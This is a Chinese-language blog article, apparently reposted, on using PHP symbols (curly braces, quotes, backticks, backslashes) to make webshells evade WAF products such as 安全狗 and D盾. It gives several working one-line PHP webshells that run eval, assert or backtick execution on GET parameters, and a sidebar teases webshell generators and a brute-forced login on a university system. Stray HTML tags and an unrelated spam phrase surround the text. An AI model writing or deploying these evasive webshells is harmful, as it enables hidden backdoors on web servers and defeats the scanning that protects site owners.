<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    webshell免殺中符號的妙用

    VSole2022-09-23 15:48:49

    前言提到webshell免殺,方法無外乎對靜態特征的變形,編碼,或利用語言特性繞過。計算機中有很多符號,它們在編程語言中占據一席之地,這些符號作為運算符號,標識符號或起到特殊含義。本文以PHP為例介紹一些利用符號免殺方法。

    免殺WAF檢測

    通過對安全狗、護衛神、D盾等常見軟WAF的測試,發現WAF查殺主要依賴兩種檢測方法1.靜態檢測:通過匹配特征來查找webshell。如危險函數,文件特征碼等。2.語法語義檢測:通過對語法語義的分析,通過對代碼抽絲剝繭實現對危險函數捕捉,例如: 危險函數(可控參數)

    括號

    圓括號: 在編程中,主要用在表達式、函數參數、指針定義等方面

    方括號:一般用于定義數組

    花括號: 定義變量處理,字符串變量后面有{ }相當于數組、規定作用域

    在變量間接引用中進行定界,避免歧義。例如 ${$my_var[8]}與${$my_var}[8]的區分

    ${xxx} 括起來的要當成變量處理。
    $a{4} 和中括號[]一樣都是把某個字符串變量當成數組處理
    

    利用花括號的特性,在雙引號對聲明變量,并利用圓括號干擾waf對語法的檢測

     <?php$_=$_GET['pass'];$white = "(${eval($_)})";
    

    引號

    單引號:被單引號包裹的特殊字符將無意義,內容將作為字符串。

    雙引號:與單引號類似,但被包裹中的特殊符號將會解析,例如 $ 符號

    反引號:執行運算符,在多數語言中可進行執行命令。php中(執行運算符)與shell_exec函數等同

    在php語言的特性中,雙引號內的變量會被解析。這時$b的值為 assert,可利用php的此特性進行拼接字符或是繞過語法。

    $a="s"."e"."r";$b="as$a".'t';
    

    利用執行運算符執行命令,避免了檢測危險函數實現免殺。

    function fun($p){  echo `$p`; }$a=$_GET['x'];fun($a);
    

    斜線

    反斜線:反斜線一般是起到轉義字符作用。例如

    \" 雙引號 "
    \\ 反斜線 \
    \n 換行 
    \r 送出 
    \t 跳位(TAB)
    \\$ 表示 $
    

    反斜線 在php中還有一種用法,就是命名空間函數前加“\”反斜線調用命名空間下的函數,如果單獨使用,就是調用根命名空間

    利用用命名空間干擾函數的特征,\n來干擾對語法的檢測

     <?php$a = $_GET['a'];$b = "\n";\assert($b.=$a);?>
    

    引申

    那么是否還有其它符號可以免殺?下面以php為例再介紹幾種符號:

    ^ :(xor)異或運算符
    ~ :(not)取反運算符
    ++ :遞增運算符
    -- :遞減運算符
    

    總結上文簡單介紹了一些符號在免殺中的用法,只要摸透了WAF的脾氣(查殺原理),繞過的方法也就層出不窮。

    免殺webshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    星辰由凌日內部大佬花了兩天時間用php語言開發的帶ui的工具,使用者可上傳由冰蝎或者天蝎生成的webshell,動態自動生成webshell。目前只支持php和jsp,其它語言各位使用者可自己去編寫腳本實現。依賴:php5.6.7+mysql+nginx后臺管理:/admin功能:1、授權功能,用戶shell生成次數限制。
    webshell之傳參方式及特征繞過傳參方式 在這里解釋一下為什么,需要講述傳參方式,由于在很多情況下,以請求頭作為參數傳遞并非waf和人工排查的重中之重且非常誤導和隱藏
    哥斯拉WebShell生成器
    引擎可以將傳統的條件、循環、函數、對象的靜態分析,目前還可以支持動態變量名、箭頭函數、反射、回調等動態特性的分析,大大的強化的未知樣本的檢測成功率。
    冰蝎流量初探
    2022-12-20 09:11:06
    本文僅針對冰蝎流量改造進行初步探討,熟悉一下整個流程,真的要繞流量設備,估計還需要其他的技巧。
    Windows defender 介紹Microsoft Defender 防病毒軟件在 Windows 1
    與此同時,隨著眾邦銀行的業務規模不斷擴大,服務客戶數量不斷提升,日益增加的服務器數量,使得系統、應用、端口等核心資產快速增加,管理難度日益增加。眾邦銀行安全負責人說。經過一段時間的磨合與實戰化運營,眾邦銀行實現了以下幾個目標: 首先是資產管理,全局在握。眾邦銀行負責人表示,目前椒圖可以幫助眾邦銀行自動識別系統和應用高危漏洞數量近700項,基本覆蓋所有主流可利用的漏洞。
    用戶名:加密密碼:密碼最后一次修改日期:兩次密碼的修改時間間隔:密碼有效期:密碼修改到期到的警告天數:密碼過期之后的寬限天數:賬號失效時間:保留。查看下pid所對應的進程文件路徑,
    0x01 前言最近遇到這樣一個場景:目標僅支持ASP腳本,而且還存在網站安全狗和360安全衛士,目前存在的兩個問題。安全狗"禁止IIS執行程序"限制了命令執行;360"進程防護"攔截了執行木馬和提權、抓明文等;這是因為wscript.shell命令執行組件被卸載了,試了下shell.application組件,結果發現也不行。當我們執行進程遷移跳出IIS的w3wp.exe進程后就已經完全繞過了安全狗"禁止IIS執行程序"限制命令執行,這時可以直接通過執行shell命令進入執行系統命令了。
    獲取到老的其他系統登錄口http://xxx.xxx.edu.cn/psy/Login2.aspx如圖,沒有任何驗證碼機制直接Burp Cluster bomb式爆破成功得到其他系統的弱口令admin,Aa123456但是老系統其他頁面已經刪除,無法正常登入后臺八嘎呀路,不是良民的干活!但推測新老系統用的同一個數據庫訪問新系統http://xxx.xxx.edu.cn/psy/Login.aspx使用密碼admin,Aa123456成功登陸后臺翻找上傳點上傳點在http://xxx.xxx.edu.cn/psy/ScaleManage/ScaleEdit.aspx?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类